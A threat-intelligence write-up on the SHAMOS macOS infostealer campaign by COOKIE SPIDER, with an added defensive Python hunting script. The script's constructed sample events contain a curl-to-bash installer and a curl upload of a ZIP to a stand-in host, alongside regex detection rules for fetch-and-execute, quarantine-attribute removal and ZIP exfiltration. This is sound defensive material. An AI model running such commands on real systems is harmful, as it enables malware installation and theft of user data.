
macOS Protection Evaded: COOKIE SPIDER's SHAMOS Deployment Thwarted by Falcon Platform

From June to August 2025, the Falcon platform blocked a COOKIE SPIDER malware campaign that delivered SHAMOS, a macOS infostealer.

macOS Protection Evaded: Falcon Platform Blocks SHAMOS Delivery from COOKIE SPIDER

Although no publicly available information identifies the people or organization behind the cybercrime group COOKIE SPIDER, defenders can still watch for its activity, in particular its use of SHAMOS, a variant of Atomic macOS Stealer (AMOS).

The campaign targeted users in multiple countries but deliberately excluded victims in Russia, likely because of eCrime forum rules. Victims were lured through malvertising websites that led to fraudulent macOS help pages, where they were instructed to run a malicious one-line installation command; running it deployed SHAMOS.

SHAMOS operators used the same delivery method in Homebrew-themed malvertising campaigns between May 2024 and January 2025. The malware collects sensitive data from disk, including cryptocurrency wallet files and credential files, and attempts to exfiltrate what it collects using Base64-encoded URLs and ZIP archives.

To help defenders hunt for this and similar activity across their endpoints, Falcon® Next-Gen SIEM Advanced Event Search queries have been published that match on the SHA256 hashes of the SHAMOS Mach-O binaries and Bash scripts; the hosting URLs associated with SHAMOS have also been identified.

Note that the legitimate iTerm2 GitHub repository is https://github.com/gnachman/iTerm2; malvertising websites that carry instructions to download SHAMOS should be avoided.

Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:

  1. Enable malware detection and prevention so that SHAMOS is detected and blocked at the earliest stages of the attack chain, which the Falcon® platform does through machine learning and indicators of attack (IOAs).
  2. Enable the settings that block malicious commands which bypass Gatekeeper security checks and install Mach-O executables directly on victim devices.
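The following is an added, defender-side illustration of hunting for the chain this write-up describes (a one-line installer that fetches or decodes a payload into a shell, a Gatekeeper bypass, and ZIP-archive exfiltration). It is written for this page and is not Falcon or CrowdStrike code, nor one of the Advanced Event Search queries the write-up refers to. Everything in it is constructed: the tab-separated event format, the example.invalid hostnames and every sample line. Treating removal of the com.apple.quarantine attribute with xattr as the concrete shape of a "Gatekeeper bypass" is this example's own assumption, since the write-up names the bypass but not the command.

```python
"""Heuristic hunting logic for a SHAMOS-style delivery chain.

Constructed example: the event format (tab-separated timestamp, parent process,
command line) and every sample line are invented for this illustration and are
not Falcon telemetry. The quarantine-attribute rule is an assumption about what
a Gatekeeper bypass looks like on the command line.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample process-execution events (tab-separated fields).
SAMPLE_EVENTS = "\n".join([
    "2025-07-02T10:14:03Z\tTerminal\t/bin/bash -c 'echo aGVsbG8gd29ybGQK | base64 -d | bash'",
    "2025-07-02T10:14:05Z\tbash\tcurl -fsSL http://example.invalid/i.sh | bash",
    "2025-07-02T10:14:09Z\tbash\txattr -d com.apple.quarantine /tmp/update",
    "2025-07-02T10:15:30Z\tupdate\tcurl -F file=@/tmp/out.zip http://example.invalid/upload",
    # Benign activity that must not fire.
    "2025-07-02T10:16:00Z\tTerminal\tbrew install wget",
    "2025-07-02T10:16:20Z\tzsh\tcurl -O https://example.invalid/report.pdf",
    "2025-07-02T10:17:00Z\tzsh\tzip -r ~/backup.zip ~/Documents",
])

# Each rule is (name, compiled regex applied to the full command line).
RULES: List[Tuple[str, re.Pattern]] = [
    # curl/wget output piped straight into a shell: the one-line installer.
    ("fetch_and_execute",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # A Base64 blob decoded and piped into a shell (macOS base64 accepts -d/-D).
    ("base64_decoded_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Assumed Gatekeeper bypass: stripping the quarantine attribute so a
    # downloaded Mach-O runs without the usual checks.
    ("quarantine_attr_removed",
     re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|-c\b)")),
    # A ZIP archive handed to curl for upload: the exfiltration step.
    ("zip_uploaded_with_curl",
     re.compile(r"\bcurl\b.*(-F|--data-binary|-T|--upload-file)\s*[^ ]*\.zip\b")),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one tab-separated event into its three fields."""
    ts, parent, cmd = line.split("\t", 2)
    return {"ts": ts, "parent": parent, "cmd": cmd}


def match_rules(cmd: str) -> List[str]:
    """Return the names of every rule that fires on a command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Run every rule over every event; return (timestamp, cmd, rules) per hit."""
    hits: List[Tuple[str, str, List[str]]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        fired = match_rules(ev["cmd"])
        if fired:
            hits.append((ev["ts"], ev["cmd"], fired))
    return hits


def chain_stages_seen(hits: List[Tuple[str, str, List[str]]]) -> List[str]:
    """Distinct rule names in first-seen order. Several stages firing on one
    host within minutes is a far stronger signal than any single hit."""
    seen: List[str] = []
    for _, _, fired in hits:
        for name in fired:
            if name not in seen:
                seen.append(name)
    return seen


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for ts, cmd, fired in results:
        print(f"{ts}  {', '.join(fired):<26} {cmd}")
    print("stages seen:", " -> ".join(chain_stages_seen(results)))
```

Rules like these are noisy on developer machines, where curl-into-shell installers are common; the useful signal is the sequence, which is why the example reports the distinct stages seen rather than treating each hit as an alert on its own.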

Between June and August 2025, the Falcon® platform blocked a malware campaign that targeted over 300 customer environments, underscoring the importance of these preventative measures.

COOKIE SPIDER operates as a malware-as-a-service, renting SHAMOS to cybercriminals for information theft and cryptocurrency asset harvesting. Remaining vigilant and implementing robust security measures can help protect against these threats.
